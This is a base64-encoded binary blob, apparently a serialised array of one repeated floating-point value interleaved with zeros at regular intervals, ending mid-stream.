+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+